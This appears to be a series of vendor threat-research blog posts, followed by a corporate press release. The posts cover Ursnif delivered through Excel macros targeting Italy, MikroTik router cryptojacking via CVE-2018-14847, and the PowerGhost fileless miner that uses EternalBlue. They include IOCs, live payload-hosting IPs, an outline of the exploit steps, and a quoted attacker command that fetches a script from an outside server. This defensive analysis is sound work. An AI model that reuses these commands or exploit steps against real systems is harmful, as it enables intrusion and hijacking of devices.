Italy is targeted again by Ursnif delivered via malicious Microsoft Excel Documents

/in /by

SonicWall RTDMI engine detected multiple targeted attacks using Microsoft Excel documents directed towards Italy. Similar attacks were observed a month back as well. Information about these fresh attacks were not available in any of the popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs.

Fig-1 : Virustotal results for the malicious file

Upon closer analysis of one of the detected samples, it is found to be using a malicious macro which downloads payload if the victim happens to be from a particular geographical area (Italy in this case). The payload malware is not downloaded directly to avoid detection. The download happens in multiple stages. In the first stage the VBA macro code executes a command present in a cell of the excel spreadsheet. This cell containing code has a very small visible size to hide from the user. We are observing this new evasion mechanism being used on recent malicious office documents where the actual malicious elements are part of the sheet data and not on the VBA macro code.

Fig-2 : command inside a cell in excel

In the second stage, the code on the hidden cell downloads an encrypted powershell script. The downloaded script is then decrypted using a hard coded key shown in Fig-2. Below image shows both the encrypted and decrypted versions of the powershell script.

Fig-3 : Encrypted and decrypted script

This second stage again downloads another powershell script which is then in-turn used to identify victim geographical location as shown below:

Fig-4 : script finding Geo-location of user

The payload which belongs to the Ursnif family at the time of analysis, is being delivered if the victim is from the specific geographical area.

Indicators of Compromise (IOC):

  • 090bf9ac357837fa7b1085fd79e21d613ebf58aaa3cf54a86711f66d267b12c3 : Malicious Excel File
  • hxxps://pag[xxx]nto.us/abcd
  • hxxps://pag[xxx]nto.us/abc
  • hxxps://pag[xxx]nto.us/realte.xlsx
  • e1e1ec90f643619c1001504897e7b00ed0906d102d8730975b9d0db1a87ec5c1 : Ursnif Malware

Hashes of similar malicious excel files:

  • 150564c5252c417c093814e7b965d327d342098bc80d4c64667df143703ed274
  • e43c3adfe2b117abbabc735e2bfe1d95b2fcac86d4b3aecffbbc6d793942f044
  • 96cede3e965bec5d4d6a558ddd01256ea160cb98ebfa6d4f431f46117c975496

Capture ATP report for this file:

Massive Cryptojacking campaign compromised ~200,000 MikroTik routers

/in /by

SonicWall is observing a massive Cryptojacking malware that is spreading aggressively throughout Brazil. The Malware attempts to exploit the vulnerability CVE-2018-14847 by targeting the unpatched versions of MikroTik RouterOS. Compromised MikroTik routers have been made to inject Coinhive miner script into the web pages it host & also pages from web proxy.  As MikroTik routers are mainly used by Internet Service Providers (ISP), the impact is huge & widespread.

Fig:1 Monero mining through compromised MikroTik RouterOS

CVE-2018-14847:

Winbox, a utility tool for administration of MikroTik RouterOS, allows remote attackers to bypass authentication and to read arbitrary files. Winbox accepts socket connection through port 8291, and in case of error, it sends out “Bad Session id” response. Along with this response one byte from the Session ID is also sent. Attackers could exploit this exposure of session ID to craft a request to get into the system. MikroTik RouterOS versions from 6.29 through 6.42 are vulnerable to this attack.

Steps to exploit this vulnerability:

1. Scan for MikroTik devices by sending UDP broadcast message to port 5678 and figure out mac address from the socket connection message.

Note: UDP port 5678 is used for MikroTik Neighbor Discovery Protocol (MNDP).

Fig: 2 Discovering MikroTik devices from POC

2. Attempt to connect to MicroTik device with its mac. Capture the Session ID leaked by the “Bad session id response”. Resend the packet by  altering just one byte of session id to bypass authentication allowing access to files

Fig 3 : Exploit code from POC

3. Extract the data files & user credential to get admin privilege over MikroTik

4. Make the below changes to the MikroTik Routers, leaving the device more vulnerable than before.

  • Disable Drop rules for Firewall
  • Enable port 4145 for ip socks
  • System scheduler to run a script named script3_ every 30s to fetch the updated mikrotik.php
    • fetch a\ddress=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http”

We too observed unusual port activity for the destination port 4145. The below spike in the port scan aligns with the time period of this attack. But the IP address that tapped is not same as 95.154.216.*

Fig: 4 NetworkScan monitor report from netlab 360

Inject Coinhive Miner script:

MikroTik can be used as web server hosting web pages & as proxy server proxying HTTP requests, caching the response to use later and also provides custom error pages. It is found that attackers have used all three venues to wide spread the injection of coinhive miner. Users connected to MikroTik RouterOS can have the script injected into their responses & as well the users visiting the pages hosted by MiktoTik (shown in Fig 1) . It spreads quickly up to ~200,000 web hosts having the Coinhive miner script linked with a single Coinhive ‘SiteKey’ that belongs to the attacker

Fig: 5 Coinhive miner script injected into a website

 

Fig: 6 Volume of web hosts impacted with this

Coninhive:

Cryptojacking is same as cryptocurrency but secret use of your computing device to mine cryptocurrency. In-browser cryptojacking secretly use the computing device of the site visitor to mine bits of cryptocurrencies.  Coinhive is a cryptocurrency mining service that offers Javascript miner API for the Monero Blockchain. It can be embedded in any website. But website owners abuse this service by not asking for users permission to run the miner. Also attackers abuse this by embedding coinhive API with his sitekey on the hacked websites. Users visiting those sites run miner on their browsers draining their CPU power as long as the browser is open. Unlike Bitcoin, Monero is untraceable and there is no way to track Monero transactions. This makes Monero an ideal candidate for hackers and Coinhive the most prevalent malware to mine cryptocurrency. With Cryptojacking, all the infected machines will work to mine cryptocurrency, more profitable than Ransomware.

Sonicwall Threat Research Lab provides protection against Coinhive miner with the following signatures:

  • GAV Coinhive.JS_2
  • GAV CoinHive.JS
  • SPY CoinHive WebAssembly Binary 1
  • IPS Coinhive Monero Miner Secure Web Traffic 1
  • IPS Coinhive Monero Miner Secure Web Traffic 2
  • IPS Coinhive Monero Miner Web Traffic 1

Trend Graph & Geostatistics :

Find below the hits that SonicWall observed in the recent past

This can be avoided by updating to the latest version of MikroTik RouterOS & securing the Router with strong authentication & firewall rules to block unauthorized access.

PowerGhost – A stealthy miner with Eternal Blue component for spreading further

/in /by

Sonicwall Capture Labs Threats Research team has been observing a stealthy cryptominer for the past several weeks that is spreading via Powershell scripts. By using obfuscated Powershell and not creating new files on the system, this miner stays hidden and out-of-sight of the unsuspecting user and spreads to other machines using Eternal Blue exploit. Owing to this silent behavior it has been named – PowerGhost.

We obtained few components of this miner corresponding to different stages of its life-cycle:

 

Stage I: Infected web-page

The infection vector of this malware appears to be malicious web-pages. We obtained a php web-page that contains a Base64 obfuscated script containing a download link for the next stage:

This is a potent way to spread infection as such web-pages can easily spread via Emails or when a user visits a website hosting the malicious page.We observed the following IP’s hosting the next stage during our analysis:

  • hxxp://185.128.43.62/eop.ps1
  • hxxp://192.74.245.97/eop.ps1

Stage II: The first PowerShell script

This obfuscated Powershell script has two objectives:

  1. Disable Windows Defender on the infected machine
  2. Identify the architecture of the machine and download the appropriate script for the next stage

Following image shows the obfuscated PowerShell script and the code obtained after de-obfuscation:

Windows Defender disabling component:

We found 4 hard-coded domains where the next stage of the attack is hosted:

  • update.7h4uk.com
  • info.7h4uk.com
  • 185.128.43.62
  • 192.74.245.97

Based on the architecture of the system appropriate script is downloaded as shown:

The following are downloaded and run as per the system architecture:

  • http://[one of the above mentioned domains]/antivirus.ps1
  • http://[one of the above mentioned domains]/antitrojan.ps1

Stage III: The second PowerShell script

This script contains multiple components that are base64 encoded. These components are collectively needed to get the infected system to start mining:
1. $miiiiii is the miner executable ( detected as )

2. $mmmmmmm is mimikatz (detected as ), a post exploitation tool that can be used to exploit Windows credentials to gain control over the infected machine:

3. $crrrrrrr and $cppppppp are MSVCR120.dll and MSVCP120.dll respectively:

4. $fffffff contains Base64 encoded code to reflectively load mimikatz in memory without writing the binary to the disk thereby adding to its stealthy nature:

This PowerShell script contains another layer of obfuscated script:

Stage IV: Attack and spread

This second layer of the obfuscated script contains some interesting and potentially dangerous components:
1. Function Download File – Downloads a file onto the infected system which can be used to install additional malicious components/executables
2. Function Get-creds – Extracts the victims logon credentials
3. Function RunDDOS – Capability to launch DDOS attacks
4. The threat seems interested in machines with private address range as it has a number of functions for this purpose:

5. The function eb7($target ,$shellcode) contains a number of suspicious components that exploit the vulnerability CVE-2017-0144 which is the infamous Eternal Blue Exploit:

SMB_COM_NT_TRANSACT contains a TRANS2_OPEN2 Transaction sub-command that has a maliciously large SizeOfListInBytes value which exploits the vulnerability CVE-2017-0144. Successful exploitation can result in arbitrary code execution with system privileges in kernel mode or cause the system to crash resulting in a denial-of-service condition.

Stealth is an important aspect of this threat as it operates without dropping/creating files on the infected machine for most of its life-cycle. Stealth attributes coupled with its ability to find new targets laterally and carrying Eternal Blue Exploit components make this an extremely dangerous threat in a corporate environment where it can harvest computing power for mining.

Sonicwall Capture Labs provides protection against this threat via the following signatures:

  • GAV: PowerShell.Gen (Exploit)
  • GAV: Mimikatz.PG (HackTool)
  • GAV: PowerGhost.FOB (Trojan)
  • GAV: PowerGhost.EOS (Trojan)
  • GAV: XMRig.XMR_3 (Trojan)
  • IPS 12814: Windows SMB Remote Code Execution (MS17-010) 5
  • IPS 12794: Windows SMB Remote Code Execution (MS17-010) 3

Images below show the heat map for XMRig.XMR_3 and the corresponding hits graph. As visible below, we saw a hit-spike for this signature in end of July:

SonicWall’s Bill Conner, Steve Pataky Honored in CRN Top 100 Executives List for 2018

/0 Comments/in /by

SonicWall CEO Bill Conner and Chief Revenue Officer Steve Pataky have each been named to CRN’s exclusive Top 100 Executives list for 2018.

Conner, who has held the top post at SonicWall since November 2016, is honored by CRN as one of the year’s most influential executives. Complementing that achievement, Pataky was dubbed one of the country’s elite channel sales leaders.

“Visionary and strategic leadership can make the difference between just surviving and actually excelling in this period of disruptive change for the IT channel,” said Bob Skelley, CEO, The Channel Company. “In order for technology suppliers and solution providers to thrive and stay ahead of the competition, they need leaders who are able to envision both the future of the channel and the role their organization needs to play in order to create that reality. CRN’s 2018 Top 100 Executives embody these qualities. They are change agents who deliver unwavering guidance to their companies, always asking where are we headed and not being afraid to take the necessary steps to get there.”

CRN’s annual Top 100 Executives list singles out the IT channel’s most effective CEOs — leaders who play an integral role in shaping the industry, whether by driving huge cultural shifts or forging innovative new routes to success.

This annual list recognizes leaders from the technology industry who have played an integral role in shaping today’s IT channel, whether by driving huge cultural shifts, creating rich new opportunities, or forging innovative routes to success.

Conner is among the most experienced security, data and infrastructure executives worldwide, with a career spanning over 30 years across numerous high-tech industries. A corporate turn-around expert, he’s re-engineered product lines, built world-class service organizations, re-aligned global sales organizations and created industry-leading marketing campaigns, and brokered multi-million dollar mergers, sales and acquisitions.

Conner also is a staunch supporter of public-private partnerships on cyber security, and is regularly called on to share his expertise with global leaders at major financial institutions, enterprises and governments.

Pataky is a sales and channel professional with over 25 years of experience architecting and executing global go-to-market strategies for networking and security technologies. A persistent channel advocate, Pataky builds innovative global programs and partner development strategies at scale to generate leverage and partner profitability.

Pataky has been recognized with CRN’s prestigious Channel Chiefs award for several years, including the 50 Most Influential Channel Chiefs in 2014, 2015, 2017 and 2018.